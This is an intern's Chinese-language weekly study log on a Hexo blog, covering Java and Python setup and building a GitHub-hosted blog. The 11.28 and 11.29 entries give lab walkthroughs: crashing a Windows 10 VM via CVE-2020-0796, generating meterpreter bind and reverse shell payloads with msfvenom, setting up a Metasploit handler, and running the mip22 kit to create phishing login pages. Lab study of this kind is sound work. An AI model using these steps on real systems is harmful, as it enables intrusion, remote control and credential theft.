
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Hexo</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="">
    <meta name="description" content="11.27 周一一.安装JDK
二.完成Java环境变量的配置：
1.于物理机右击此电脑，点击属性，找到高级系统设置，选择高级，进入环境变量。
2.于系统变量中新建变量，输入变量名JAVA_HOME，变量值根据自己的jdk的安装路径填写为JDK的bin目录所在路径。
3.在系统变量里新建”classpath”变量，值为：.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; 找到path变量添加变量值：%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin。
4.Window+R输入cmd，打开命令行，输入命令java -version，如下图所示则配置成功...">
    
        <link rel="icon" href="/favicon.ico">
    
    
        
            <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
        
            <link rel="stylesheet" href="/css/stage.css">
        
            <link rel="stylesheet" href="/css/avatar-bg.css">
        
    
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
<header id="header">
    <div class="menu">
        <i class="fa fa-bars"></i>
    </div>
    <div class="header-main">
        <h1><a href="/">Hexo</a></h1>
    </div>
    <div id="nav">
        <div class="nav-img" id="nav-img"></div>
        <div class="sentences">
            云里写诗，泥里生活，岁月里洒脱。
        </div>
    </div>
</header>

<div id="content-outer">
    <div id="content-inner">
        <div class="clearfix">
    <article id="post">
        <h1></h1>
        <div class="create">
            <span>Created</span>
            
                <time datetime="2023-12-02T07:47:00.000Z">
                    2023-12-02
                </time>
            
            
        </div>
        <h1 id="11-27-周一"><a href="#11-27-周一" class="headerlink" title="11.27 周一"></a>11.27 周一</h1><p>一.安装JDK</p>
<p>二.完成Java环境变量的配置：</p>
<p>1.于物理机右击此电脑，点击属性，找到高级系统设置，选择高级，进入环境变量。</p>
<p>2.于系统变量中新建变量，输入变量名JAVA_HOME，变量值根据自己的jdk的安装路径填写为JDK的bin目录所在路径。</p>
<p>3.在系统变量里新建”classpath”变量，值为：.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; 找到path变量添加变量值：%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin。</p>
<p>4.Window+R输入cmd，打开命令行，输入命令java -version，如下图所示则配置成功。</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202155648307.png" alt="image-20231202155648307"></p>
<p>三.Python环境搭建：</p>
<p>1.输入python官网地址，进入官网点击Downloads选择Windows，进入此页面，找到3.6.4版本集，下载安装包。</p>
<p>2.运行安装包，勾选左下角Add python 3.6 to  PATH，然后选择第二个自定义安装（Customize installation），其他选项默认，自定义安装路径，完成安装。</p>
<p>3.Windows+R然后输入cmd，打开命令行输入python，如下图所示安装完成<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202160349502.png" alt="image-20231202160349502"></p>
<p>（安装路径不能出现中文）</p>
<h1 id="11-28-周二"><a href="#11-28-周二" class="headerlink" title="11.28 周二"></a>11.28 周二</h1><h2 id="永恒之黑漏洞"><a href="#永恒之黑漏洞" class="headerlink" title="永恒之黑漏洞"></a>永恒之黑漏洞</h2><p>1.打开VMware软件，创建虚拟机靶机Win10X64与虚拟机kali linux，关闭靶机防火墙</p>
<p>2.将压缩包CVE-2020-0796-Scanner粘贴至Win10。window+R打开一个命令行于命令行输入“ipconfig”查看Win10的ip,，解压并打开文件夹CVE-2020-0796-Scanner于路径栏输入“cmd”打开命令行。再输入“CVE-2020-0796-Scanner.exe”运行检测工具，输入靶机ip，查看靶机漏洞</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202161142941.png" alt="image-20231202161142941"></p>
<p>3.打开kali虚拟机，将压缩包CVE-2020-0796-PoC-master粘贴至kali系统，解压并打开文件夹CVE-2020-0796-PoC-master，于文件夹空格处右键单击选择“在这里打开终端”进入命令行。</p>
<p>4.输入命令“sudo su”输入密码进入管理员状态。</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202161241024.png" alt="image-20231202161241024"></p>
<p>5.输入命令“pip install ntlm_auth”加入安装包</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202161327255.png" alt="image-20231202161327255"></p>
<p>6.输入命令“python3 CVE-2020-0796.py 靶机的ip地址”，对永恒之黑漏洞进行攻击，致使目标靶机出现蓝屏重启报错的现象。<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202161353851.png" alt="image-20231202161353851"></p>
<h1 id="11-29-周三"><a href="#11-29-周三" class="headerlink" title="11.29 周三"></a>11.29 周三</h1><h2 id="永恒之黑的另一种复现以及利用漏洞对靶机进行监听"><a href="#永恒之黑的另一种复现以及利用漏洞对靶机进行监听" class="headerlink" title="永恒之黑的另一种复现以及利用漏洞对靶机进行监听"></a>永恒之黑的另一种复现以及利用漏洞对靶机进行监听</h2><p>1.打开VMware软件，创建虚拟机靶机Win10X64与虚拟机kali linux，关闭靶机防火墙</p>
<p>2.将压缩包CVE-2020-0796-Scanner粘贴至Win10。window+R打开一个命令行于命令行输入“ipconfig”查看Win10的ip地址192.168.138.129。,，解压并打开文件夹CVE-2020-0796-Scanner于路径栏输入“cmd”打开命令行。再输入“CVE-2020-0796-Scanner.exe”运行检测工具，输入靶机ip，查看靶机漏洞</p>
<p>3.下载漏洞利用工具，安装在kali中，在kali中利用MSF生成木马：<br>“msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp LPORT&#x3D;6666 -b ‘\x00’ -i 1 -f python ”</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202162700658.png" alt="image-20231202162700658"></p>
<p>4.将生成的shellcode将POC文件里exploit.py中的一部分替换掉，直接复制粘贴，将buf替换成USER_PAYLOAD<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202162820852.png" alt="image-20231202162820852"></p>
<p>5.于kali攻击机中exploit.py文件夹空白处右键，选择“在这里打开终端”，在打开的命令行输入以下命令使靶机蓝屏：python3 exploit.py -ip 192.168.138.129<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202162928848.png" alt="image-20231202162928848"></p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202162947896.png" alt="image-20231202162947896"></p>
<p>6.于桌面打开终端输入以下命令使kali进入监听模式：msfconsole</p>
<p>7.输入以下命令使kali对靶机进行监听：<br>use exploit&#x2F;multi&#x2F;handler<br>set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp<br>set rhost 靶机IP<br>set lport 生成木马时设置的端口                       run</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202163052195.png" alt="image-20231202163052195"></p>
<p>8.首次监听失败，重复运行蓝屏代码，再次监听，在没有报错的情况增加蓝屏攻击次数增加监听成功概率，直至监听成功<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202163337097.png" alt="image-20231202163337097"></p>
<p>此次监听为正向链接，kali端链接靶机；还可以进行反向链接，靶机链接kali端，需要将部分命令修改：1.msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.93.129 LPORT&#x3D;6666 -b ‘\x00’ -i 1 -f python ，此处ip端口为kali端ip位置。2.use exploit&#x2F;multi&#x2F;handler<br>set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp<br>set LHOST kali端IP<br>set lport 生成木马时设置的端口</p>
<h2 id="部分登录页面钓鱼网站的建立"><a href="#部分登录页面钓鱼网站的建立" class="headerlink" title="部分登录页面钓鱼网站的建立"></a>部分登录页面钓鱼网站的建立</h2><p>1.于物理机打开代理，Windows+R输入cmd打开命令行，输入命令ipconfig查询物理机ip地址</p>
<p>2.打开kali，于桌面打开终端，输入sudo su，输入kali密码进入管理员模式</p>
<p>3.输入命令 vim &#x2F;etc&#x2F;proxychains4.conf编辑代理设置，下拉至最后一行，单机空处，按i键进入编辑模式，更改ip地址为物理机地址+代理端口的格式，ESC，输入：wq退出并保存代理设置。<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202171417657.png" alt="image-20231202171417657"><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202171507923.png" alt="image-20231202171507923"></p>
<p>4.继续输入proxychains4 git clone <a target="_blank" rel="noopener" href="https://github.com/makdosx/mip22%EF%BC%8C%E4%B8%8B%E8%BD%BDmip22%E6%96%87%E4%BB%B6![image-20231202171737784](https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202171737784.png)">https://github.com/makdosx/mip22，下载mip22文件![image-20231202171737784](https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202171737784.png)</a></p>
<p>5.输入命令“chmod -R 777 mip22”复制mip22，“cd mip22”传送到mip22的位置，改写mip22文件的权限<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172636248.png" alt="image-20231202172636248"></p>
<p>6.找到mip22文件夹于空白处右键打开终端，输入命令“proxychains4 bash mip22.sh”，运行程序打开，根据提示数字，创建相应的钓鱼网站<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172619751.png" alt="image-20231202172619751"></p>
<h1 id="11-30-周四"><a href="#11-30-周四" class="headerlink" title="11.30 周四"></a>11.30 周四</h1><h2 id="Github的创建"><a href="#Github的创建" class="headerlink" title="Github的创建"></a>Github的创建</h2><p>1.打开Win10虚拟机下载Git GMD与Node.js软件<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172704918.png" alt="image-20231202172704918"></p>
<p>2.注册git hub账号<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172728756.png" alt="image-20231202172728756"></p>
<p>3.打开c盘新建文件夹，重命名为boke，右键文件夹选择Open Git Bash here，依次输入以下代码等待下载完成：<br>npm install -g hexo-cli<br>hexo init blog<br>cd blog<br>hexo g<br>hexo new x<br>hexo g<br>hexo s<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172804892.png" alt="image-20231202172804892"></p>
<p>4.打开浏览器，以IP：端口（192.168.138.129:4000&#x2F;）的形式搜索网页<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172848786.png" alt="image-20231202172848786"></p>
<p>5.在虚拟机中输入ctrl+c停止分享，依次输入以下命令：hexo clean；cd ~&#x2F;.ssh；ssh-keygen -t rsa -C “注册git hub的邮件地址”，打开c盘用户文件夹，选择admin，选择.ssh文件，选择id_rsa以记事本打开，复制，粘贴至git hub的设置ssh keys中生成密钥。<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202172953006.png" alt="image-20231202172953006"><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173004266.png" alt="image-20231202173004266"></p>
<p>6.输入命令“ssh -T <a href="mailto:&#x67;&#x69;&#x74;&#64;&#103;&#105;&#x74;&#x68;&#117;&#x62;&#x2e;&#99;&#111;&#x6d;">&#x67;&#x69;&#x74;&#64;&#103;&#105;&#x74;&#x68;&#117;&#x62;&#x2e;&#99;&#111;&#x6d;</a>”，选择yes，<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173032581.png" alt="image-20231202173032581"></p>
<p>7.在blog文件栏打入cmd，输入命令npm install hexo-deployer-git –save<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173100867.png" alt="image-20231202173100867"></p>
<p>8.输入代码.git config –global user.name “xxx”&#x2F;&#x2F; 你的github用户名，非昵称<br>git config –global user.email “<a href="mailto:&#x78;&#120;&#120;&#x40;&#113;&#113;&#46;&#x63;&#111;&#109;">&#x78;&#120;&#120;&#x40;&#113;&#113;&#46;&#x63;&#111;&#109;</a>“&#x2F;&#x2F; 填写你的github注册邮箱<br>打开github网站，创建一个库<img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173117937.png" alt="image-20231202173117937"></p>
<p>9.于blog文档的congig文件以记事本打开，添加标识的代码：</p>
<p>deploy:<br> type: git<br> repository: <a href="mailto:&#103;&#x69;&#x74;&#64;&#103;&#x69;&#x74;&#104;&#x75;&#x62;&#46;&#x63;&#111;&#109;">&#103;&#x69;&#x74;&#64;&#103;&#x69;&#x74;&#104;&#x75;&#x62;&#46;&#x63;&#111;&#109;</a>:xxx&#x2F;xxx.github.io.git<br> branch: main</p>
<p>保存，于github命令栏输入<br>hexo d -g命令，完成本地文件的上传。</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202173155931.png" alt="image-20231202173155931"></p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173314783.png" alt="image-20231202173314783"></p>
<h2 id="Github主题的更换"><a href="#Github主题的更换" class="headerlink" title="Github主题的更换"></a>Github主题的更换</h2><p>1.打开库，此电脑，找到boke文件夹，打开文件夹右键blog文件夹，选择</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202173815110.png" alt="image-20231202173815110"></p>
<p>2.打开浏览器，搜索hexo主页（需要开代理），找到主题，选择合适的主题复制下载方式，于打开的Git CMD中运行，下载主题，下载完成后输入代码hexo clean，再输入命令hexo d -g保存主题</p>
<p>3.打开自己的git hub网站（github的id.github.io）观察主题是否更换</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimgimage-20231202174410527.png" alt="image-20231202174410527"></p>
<h1 id="12-1-周五"><a href="#12-1-周五" class="headerlink" title="12.1 周五"></a>12.1 周五</h1><h2 id="Github的编写"><a href="#Github的编写" class="headerlink" title="Github的编写"></a>Github的编写</h2><p>1.打开虚拟机，下载压缩包，完成程序Typora与PicGo的安装</p>
<p>2.对PicGo完成设置如下图所示，确定并设为默认图床，自定义域名的格式为“<a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/%E4%BD%A0%E7%9A%84github%E7%94%A8%E6%88%B7%E5%90%8D/%E4%BD%A0%E7%9A%84%E4%BB%93%E5%BA%93%E5%90%8D@%E5%88%86%E6%94%AF%EF%BC%88%E4%B8%80%E8%88%AC%E4%B8%BAmain%EF%BC%89/%E2%80%9D">https://cdn.jsdelivr.net/gh/你的github用户名/你的仓库名@分支（一般为main）/”</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202174837520.png" alt="image-20231202174837520"></p>
<p>3.打开Typora，选择文件，偏好设置，点击图像，如图所示设置，路径为PigcGo的文件所在位置</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202175211080.png" alt="image-20231202175211080"></p>
<p>4.验证图片上传选择，完成验证</p>
<p><img src="https://cdn.jsdelivr.net/gh/xoxoxooxox/image@main//imgimage-20231202175247442.png" alt="image-20231202175247442"></p>
<p>5.利用Typora打开相应的文件即可编辑博客，编辑完成后保存，找到boke文件夹，打开文件夹右键blog文件夹，选择Open Git Bash here，输入代码”hexo d -g”,等待上传完毕，刷新自己的github即可。</p>
<p>6.下面介绍部分编辑博客的代码：</p>
<p>开启服务：hexo server                                              新建文章a：hexo new a（a可以为任意文章名）</p>
<p>新建草稿b：hexo new draft b                                  将草稿b成为文章：hexo publish b</p>
<p>发布页面c：hexo new page c                                   生成静态文章：hexo generate 或者是 hexo g</p>
<p>部署文章：hexo deploy 或者是 hexo d</p>

        <div>
            
        </div>
        <div class="bottom-line"></div>
        
    <nav id="article-nav">
        
            <a href="/2023/12/08/%E5%AE%9E%E4%B9%A0%E7%AC%AC%E4%BA%8C%E5%91%A8/" id="article-nav-newer" class="article-nav-link-wrap">
        <span class="article-nav-title">
            
                实习第二周
            
        </span>
                <strong class="article-nav-caption">&gt;</strong>
            </a>
        
        
            <a href="/2023/11/30/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
                <strong class="article-nav-caption">&lt;</strong>
                <span class="article-nav-title">
                    
                        Hello World
                </span>
                
            </a>
        
    </nav>


        
    </article>
    <div id="toc">
        
            <h2>Table of Contents</h2>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#11-27-%E5%91%A8%E4%B8%80"><span class="toc-number">1.</span> <span class="toc-text">11.27 周一</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#11-28-%E5%91%A8%E4%BA%8C"><span class="toc-number">2.</span> <span class="toc-text">11.28 周二</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.1.</span> <span class="toc-text">永恒之黑漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#11-29-%E5%91%A8%E4%B8%89"><span class="toc-number">3.</span> <span class="toc-text">11.29 周三</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%E7%9A%84%E5%8F%A6%E4%B8%80%E7%A7%8D%E5%A4%8D%E7%8E%B0%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%AF%B9%E9%9D%B6%E6%9C%BA%E8%BF%9B%E8%A1%8C%E7%9B%91%E5%90%AC"><span class="toc-number">3.1.</span> <span class="toc-text">永恒之黑的另一种复现以及利用漏洞对靶机进行监听</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E5%88%86%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%E9%92%93%E9%B1%BC%E7%BD%91%E7%AB%99%E7%9A%84%E5%BB%BA%E7%AB%8B"><span class="toc-number">3.2.</span> <span class="toc-text">部分登录页面钓鱼网站的建立</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#11-30-%E5%91%A8%E5%9B%9B"><span class="toc-number">4.</span> <span class="toc-text">11.30 周四</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Github%E7%9A%84%E5%88%9B%E5%BB%BA"><span class="toc-number">4.1.</span> <span class="toc-text">Github的创建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Github%E4%B8%BB%E9%A2%98%E7%9A%84%E6%9B%B4%E6%8D%A2"><span class="toc-number">4.2.</span> <span class="toc-text">Github主题的更换</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#12-1-%E5%91%A8%E4%BA%94"><span class="toc-number">5.</span> <span class="toc-text">12.1 周五</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Github%E7%9A%84%E7%BC%96%E5%86%99"><span class="toc-number">5.1.</span> <span class="toc-text">Github的编写</span></a></li></ol></li></ol>
        
    </div>
</div>

    </div>
</div>
<footer id="footer">
    <div id="copyright">&copy; John Doe  2023</div>
    <div id="theme">
        Powered by <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a>. Theme by <a target="_blank" rel="noopener" href="https://github.com/markyong/hexo-theme-stage">Stage</a>
    </div>
</footer>
<script src="/lib/js/waterrippleeffect.min.js"></script>
<script src="/js/header-bg.main.js"></script>

    <script src="/lib/js/smooth-scroll.min.js"></script>
    <script src="/js/toc.main.js"></script>

</body>
</html>
